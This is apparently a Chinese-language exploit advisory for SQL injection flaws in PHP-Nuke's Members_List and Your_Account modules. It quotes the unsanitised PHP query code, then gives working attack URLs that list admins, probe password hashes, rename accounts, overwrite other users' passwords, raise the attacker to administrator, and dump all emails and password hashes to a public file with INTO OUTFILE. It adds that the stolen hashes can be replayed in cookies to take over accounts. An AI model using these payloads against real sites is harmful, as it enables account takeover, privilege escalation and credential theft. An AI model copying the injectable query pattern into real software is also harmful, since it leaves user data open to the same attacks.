SQL的Members_List、Your_Account模块中存在注入缺陷。如果magic_quotes_gpc选项为“OFF”,攻击者使用下列攻击方法及代码能利用该缺陷:
PHP代码/位置:
?/modules/Members_List/index.php : ------------------------------------------------------------------------ [...] $count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users "; $select = "select uid, name, uname, femail, url from ".$user_prefix."_users "; $where = "where uname != Anonymous ";
if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) { $where .= "AND uname like ".$letter."% ";
} else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) { $where .= "AND uname REGEXP \"^\[1-9]\" ";
} else { $where .= ""; } $sort = "order by $sortby"; $limit = " ASC LIMIT ".$min.", ".$max;
$count_result = sql_query($count.$where, $dbi); $num_rows_per_order = mysql_result($count_result,0,0);
$result = sql_query($select.$where.$sort.$limit, $dbi) or die();
echo "<br>"; if ( $letter != "front" ) { echo "<table width=\"100%\" border=\"0\" cellspacing=\"1\"><tr>\n"; echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._NICKNAME."</b></font></td>\n"; echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._REALNAME."</b></font></td>\n"; echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._EMAIL."</b></font></td>\n"; echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._URL."</b></font></td>\n"; $cols = 4; [...] ------------------------------------------------------------------------
/modules/Your_Account/index.php : switch($op) { [...] case "mailpasswd": mail_password($uname, $code); break;
case "userinfo": userinfo($uname, $bypass, $hid, $url); break;
case "login": login($uname, $pass); break; [...] case "saveuser": saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter); break; [...] case "savehome": savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson); break;
case "savetheme": savetheme($uid, $theme); break; [...] case "savecomm": savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax); break; [...] } ------------------------------------------------------------------------
/modules/Your_Account/index.php : [...] function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) { global $user, $Cookie, $userinfo, $EditedMessage, $user_prefix, $dbi, $module_name; Cookiedecode($user); $check = $Cookie[1]; $check2 = $Cookie[2]; $result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi); list($vuid, $ccpass) = sql_fetch_row($result, $dbi); if (($uid == $vuid) AND ($check2 == $ccpass)) { if (!eregi("http://";, $url)) { $url = "http://$url"; } if ((isset($pass)) && ("$pass" != "$vpass")) { echo "<center>"._PASSDIFFERENT."</center>"; } elseif (($pass != "") && (strlen($pass) < $minpass)) { echo "<center>"._YOUPASSMUSTBE." <b>$minpass</b> "._CHARLONG."</center>"; } else { if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio = FixQuotes($bio); } if ($pass != "") { Cookiedecode($user); sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi); $pass = md5($pass); sql_query("update ".$user_prefix."_users set name=$realname, email=$email, femail=$femail, url=$url, pass=$pass, bio=$bio , user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ, user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig, user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm, newsletter=$newsletter where uid=$uid", $dbi); $result = sql_query("select uid, uname, pass, storynum, umode, uorder, thold, noscore, ublockon, theme from ".$user_prefix."_users where uname=$uname and pass=$pass", $dbi); if(sql_num_rows($result, $dbi)==1) { $userinfo = sql_fetch_array($result, $dbi);
doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum], $userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon], $userinfo[theme],$userinfo[commentmax]); } else { echo "<center>"._SOMETHINGWRONG."</center><br>"; } sql_query("UNLOCK TABLES", $dbi); } else { sql_query("update ".$user_prefix."_users set name=$realname, email=$email, femail=$femail, url=$url, bio=$bio, user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ, user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig, user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm, newsletter=$newsletter where uid=$uid", $dbi); if ($attach) { $a = 1; } else { $a = 0; } } Header("Location: modules.php?name=$module_name"); } } } [...] function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson) { global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name; Cookiedecode($user); $check = $Cookie[1]; $check2 = $Cookie[2]; $result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi); list($vuid, $ccpass) = sql_fetch_row($result, $dbi); if (($uid == $vuid) AND ($check2 == $ccpass)) { if(isset($ublockon)) $ublockon=1; else $ublockon=0; $ublock = FixQuotes($ublock); sql_query("update ".$user_prefix."_users set storynum=$storynum, ublockon=$ublockon, ublock=$ublock, broadcast=$broadcast, popmeson=$popmeson where uid=$uid", $dbi); getusrinfo($user); doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode], $userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon], $userinfo[theme],$userinfo[commentmax]); Header("Location: modules.php?name=$module_name"); } }
function savetheme($uid, $theme) { global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name; Cookiedecode($user); $check = $Cookie[1]; $check2 = $Cookie[2]; $result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi); list($vuid, $ccpass) = sql_fetch_row($result, $dbi); if (($uid == $vuid) AND ($check2 == $ccpass)) { sql_query("update ".$user_prefix."_users set theme=$theme where uid=$uid", $dbi); getusrinfo($user); doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum], $userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon], $userinfo[theme],$userinfo[commentmax]); Header("Location: modules.php?name=$module_name&theme=$theme"); } } [...] function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax) { global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name; Cookiedecode($user); $check = $Cookie[1]; $check2 = $Cookie[2]; $result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi); list($vuid, $ccpass) = sql_fetch_row($result, $dbi); if (($uid == $vuid) AND ($check2 == $ccpass)) { if(isset($noscore)) $noscore=1; else $noscore=0; sql_query("update ".$user_prefix."_users set umode=$umode, uorder=$uorder, thold=$thold, noscore=$noscore, commentmax=$commentmax where uid=$uid", $dbi); getusrinfo($user); doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass], $userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore], $userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]); Header("Location: modules.php?name=$module_name"); } } [...] ------------------------------------------------------------------------
/modules/Your_Account/index.php : [...] function mail_password($uname, $code) { global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi, $module_name; $result = sql_query("select email, pass from ".$user_prefix."_users where (uname=$uname)", $dbi); if(!$result) { include("header.php"); OpenTable(); echo "<center>"._SORRYNOUSERINFO."</center>"; CloseTable(); include("footer.php"); [...] ------------------------------------------------------------------------
------------------------------------------------------------------------ [...] function userinfo($uname, $bypass=0, $hid=0, $url=0) { global $user, $Cookie, $sitename, $prefix, $user_prefix, $dbi, $admin, $broadcast_msg, $my_headlines, $module_name; $result = sql_query("select uid, femail, url, bio, user_avatar, user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest, user_sig, pass, newsletter from ".$user_prefix."_users where uname=$uname", $dbi); $userinfo = sql_fetch_array($result, $dbi); [...] ------------------------------------------------------------------------
------------------------------------------------------------------------ [...] function login($uname, $pass) { global $setinfo, $user_prefix, $dbi, $module_name; $result = sql_query("select pass, uid, storynum, umode, uorder, thold, noscore, ublockon, theme, commentmax from ".$user_prefix."_users where uname=$uname", $dbi); $setinfo = sql_fetch_array($result, $dbi); [...] } [...] ------------------------------------------------------------------------ |
Members_List模块:
- 显示用户:
http://[target]/modules.php?name=Members_List&letter=All&sortby=pass
- 显示用户:
http://[target]/modules.php?name=Members_List&letter=All&sortby=uid
- 显示moderators :
http://[target]/modules.php?name=Members_List&letter=%20OR%20user_level=2/*
- 显示管理员:
http://[target]/modules.php?name=Members_List&letter=%20OR%20user_level=4/*
- 显示所有以“abc”开头的用户 :
http://[target]/modules.php?name=Members_List&letter=%20OR%20pass%20LIKE%20abc%25/*
Your_Account模块 :
- 将“Admind”用户更名为“Hophophop” :
http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,name=Hophophop%20where%20uname=Admin/*&uid=[OUR_UID]
- 在md5_decrypted中将“Bob”的密码改为“d41d8cd98f00b204e9800998ecf8427e”:
http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=saveuser&realname=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=saveuser&email=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=savehome&storynum=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=savehome&ublockon=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=savecomm&umode=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=savecomm&thold=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
- 将普通用户提升至管理员权限:
http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,user_level=4&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=saveuser&femail=,user_level=4&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=saveuser&url=http://,user_level=4&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=savehome&broadcast=,user_level=4&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=savecomm&uorder=,user_level=4&uid=[OUR_UID]
- 将所有用户的电子邮件和crypted密码保存在http://[target]/AllMailPass.txt中 :
http://[target]/modules.php?name=Your_Account&op=mailpasswd&uname=)
%20OR%201=1%20INTO%20OUTFILE%20/[path/to/site]/AllMailPass.txt/*
利用Cookie发送crypted密码能访问用户帐户。
- 将用户的所有信息保存在http://[target]/admintxt中:
http://[target]/modules.php?name=Your_Account&op=login&uname=%20OR%user_level>
1%20INTO%20OUTFILE%20/[path/to/site]/admin.txt
[path/to/site]能在http://[target]/modules/Forums/bb_smilies.php中查询到。